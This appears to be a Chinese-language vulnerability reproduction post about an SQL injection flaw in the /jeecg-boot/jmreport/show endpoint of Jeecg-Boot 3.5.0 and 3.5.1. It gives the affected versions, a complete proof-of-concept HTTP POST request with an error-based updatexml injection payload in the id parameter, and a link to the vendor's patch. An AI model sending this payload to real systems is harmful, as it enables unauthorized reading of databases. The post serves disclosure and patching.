0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Jeecg-Boot是JeecgBoot社区的一款基于代码生成器的低代码平台。

jeecg-boot 3.5.0和3.5.1 版本存在安全漏洞,该漏洞源于 /jeecg-boot/jmreport/show 接口的 id 参数存在SQL注入漏洞。

0x02影响版本

jeecg-boot 3.5.1

jeecg-boot 3.5.0

640 (20)_副本

0x03漏洞复现

1.访问漏洞环境

640 (34)_副本

2.对漏洞进行复现

Poc

POST /jeecg-boot/jmreport/show HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 147
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip

{
  "id": "961455b47c0b86dc961e90b5893bff05",
  "apiUrl": "",
  "params": {
    "id ": "1 ' or ' % 1 % ' like (updatexml(0x3a,concat(1,(version())),1)) or ' % % ' like '"
  }
}

复现请求

640 (21)_副本

3.nuclei工具测试(漏洞不存在)

640 (22)_副本

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/jeecgboot/jeecg-boot/issues/4976